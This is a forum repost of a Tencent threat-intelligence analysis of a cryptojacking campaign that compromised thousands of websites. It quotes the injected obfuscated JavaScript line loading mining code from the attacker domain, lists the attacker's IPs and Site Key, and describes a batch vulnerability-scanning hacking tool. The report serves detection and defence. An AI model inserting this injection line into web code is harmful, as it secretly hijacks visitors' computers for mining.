搜索
查看: 276|回复: 0

C0594组织恶意挖矿攻击,已攻陷数千个网站

[复制链接]

1819

主题

2232

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
10943
发表于 2018-4-27 09:38:41 | 显示全部楼层 |阅读模式
原文链接:http://www.freebuf.com/articles/web/167620.html

0×1 概况

腾讯御见威胁情报中心近期监测发现,包括传统企业、互联网公司、学校和政府机构等在内的多个网站网页被植入挖矿JS脚本。经分析,该批站点中的核心JS文件被注入恶意代码,通过请求同一个脚本文件(http(:)//a.c0594.com/?e=5),加载另一个脚本文件(http(:)//a.c0594.com/?js=1)提供的CoinHive挖矿代码,从而在用户机器上执行挖矿。

15228369961721.jpg

15228370074148.jpg

与以往直接在网页源码插入CoinHive挖矿代码不同,此次发现的挖矿行为通过动态加载JS文件,在不同网页中插入同样的恶意代码,并且统计收益的Site Key也相同,可以推测是同一个组织进行的一次有组织的攻击。由于该段挖矿代码来源于a.c0594.com,我们暂且将其称为C0594组织恶意挖矿事件。

15228370182164.jpg

0×2 事件分析

以该批站点中的bayimg.co网站为例,分析如下:

从bayimg.co网站源码,可看到JS:jquery.cookie.js被注入了恶意代码:

document.write('<script src=http://a'+'.c059'+'4.com/?e=5></script>')

15228370423152.jpg

hxxp://a.c0594.com/?e=5同时会调用hxxp://a.c0594.com/?js=1

15228370604955.jpg

从而链接到CoinHive挖矿平台,执行挖矿操作。

15228370758356.jpg

挖矿收益最终归属为Coinhive.com对应Site Key: 99nheD84S8eJK7eD4pufvR5Wd1KGjxlj

在whorunscoinhive.com查询该Site Key挖矿的网页月流量达1011442,排在网页挖矿top榜第56位:

15228370893617.jpg

0×3 木马溯源

通过搜索引擎,可看到该组织早在2014年就开始对大量网站进行攻击:

15228371002314.jpg

15228371239555.jpg

使用腾讯御见威胁情报平台对a.c0594.com进行反查,发现该域名曾解析到ip 62.210.181.55和47.89.176.191

15228371367182.jpg

继续反查这两个ip,发现其下存在较多xxx.c0594.com以及xxx.094n.com的域名。

15228371483278.jpg

15228371638434.jpg

其中域名member.094n.com引起了我们的注意。

15228371767667.jpg

该平台提供webshell列表、WordPress漏洞列表、网站注入点管理等功能。在产品更新记录中还可以看到对struct漏洞攻击、sqlMAP注入攻击等的更新记录。

15228371912112.jpg

从网站下载最新的软件得到一款名为Black Spider的黑帽辅助软件。

15228372031171.jpg

该软件可以批量检测网站的漏洞,提供功能包括:自动爬取Getshell、自动扫描注入点、自动文件探测、旁站C段扫描、漏洞扫描、CMS安全检测、批量检测注入等。

15228372217545.jpg

软件的CMS.txt文件记录了支持检测的一百多种建站系统漏洞,包括学校建站系统、企业建站系统、文章管理等建站系统的漏洞。

15228372358714.jpg

针对各类漏洞,Black Spider.exe构造对应的url请求进行检测。

15228372483307.jpg

该工具可以检测出此次中招网站的Fck上传等漏洞。不法分子亦可利用此工具,通过后门植入挖矿代码或执行其它恶意动作。

15228372651819.jpg

15228372826645.jpg

Black Spider工具由Alihack.com开发而成,从挖矿木马所在网站a.c0594.com与黑客工具网站member.094n.com的IP信息也可看出二者关系微妙。

15228373084664.jpg

15228373263292.jpg

0×4 安全建议

15232665754659.jpg

腾讯安全专家建议如下:

1.使用腾讯企业安全“御知”(检测地址https://s.tencent.com/product/yuzhi/index.html)进行风险扫描和站点监控,及时修复Web服务器建站系统安全漏洞。

2. 网站管理员自查网站源码中是否包含“src=hxxp://a’+’.c059′+’4.com/?e=5”,若有,则表示已被入侵,可删除相关恶意代码。

3. 网站管理员可使用腾讯云网站管家智能防护平台,其具备Web入侵防护,0Day漏洞补丁修复等多纬度防御策略,可全面保护网站系统。下载地址:https://cloud.tencent.com/product/waf

4. 普通网民可使用腾讯电脑管家拦截含挖矿木马的网页。

0×5 附录

受影响网站(部分):

1522837467445.jpg

*本文作者:腾讯电脑管家,转载请注明来自 FreeBuf.COM。


过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表